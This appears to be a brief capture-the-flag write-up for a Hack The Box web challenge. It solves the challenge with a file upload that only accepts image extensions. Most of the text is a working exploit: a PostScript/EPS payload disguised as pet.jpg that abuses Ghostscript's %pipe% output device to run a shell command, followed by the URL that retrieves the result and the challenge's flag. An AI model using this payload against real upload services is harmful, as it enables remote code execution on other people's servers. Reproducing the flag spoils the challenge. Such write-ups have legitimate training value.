http://188.166.169.77:30148
from code:
ALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg'])
upload png, jpg, and jpeg files test, success.
It's remote code execution on the website via a jpg/png/jpeg extension file.
pet.jpg
%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: -0 -0 100 100
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%cat flag >> /app/application/static/petpets/flag.txt) currentdevice putdeviceprops
upload and then:
http://188.166.169.77:30148/static/petpets/flag.txt
HTB{c0mfy_bzzzzz_rcb33s_v1b3s}